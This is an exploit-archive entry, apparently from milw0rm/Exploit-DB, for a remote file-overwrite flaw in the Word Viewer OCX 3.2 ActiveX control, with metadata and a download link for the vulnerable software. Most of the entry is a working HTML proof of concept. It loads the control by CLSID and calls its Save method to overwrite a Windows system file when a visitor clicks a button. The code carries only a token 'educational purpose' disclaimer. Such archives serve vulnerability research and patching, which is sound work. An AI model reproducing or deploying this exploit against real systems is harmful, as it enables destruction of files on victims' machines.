Word Viewer OCX 3.2 - ActiveX 'Save' Remote File Overwrite

Author: Houssamix
type: remote
platform: windows
port: 
date_added: 2009-01-12  
date_updated: 2017-01-16  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 7747.html  
=======================================================================================<br>
Author: Houssamix									   <br>
=======================================================================================<br>

 Word viewer OCX V 3.2 Remote File Overwrite exploit				<br>
 Download : http://www.officeocx.com/download/WordOCXSetup3.2.exe		 <br>

 Tested on Windows XP Professional SP2 , with Internet Explorer 6	<br>


=======================================================================================<br>
<HTML>
<BODY>
 <object id=hsmx classid="clsid:{97AF4A45-49BE-4485-9F55-91AB40F22BF2}"></object>

<SCRIPT>

function Do_it()
 {
     File = "c:\\windows\\system_.ini"
   hsmx.Save(File)
 }

</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="execute exploit"><br>
</body>
</HTML>
=======================================================================================<br>

This was written for educational purpose. Use it at your own risk.<br>
Author will be not responsible for any damage.<br>

# milw0rm.com [2009-01-13]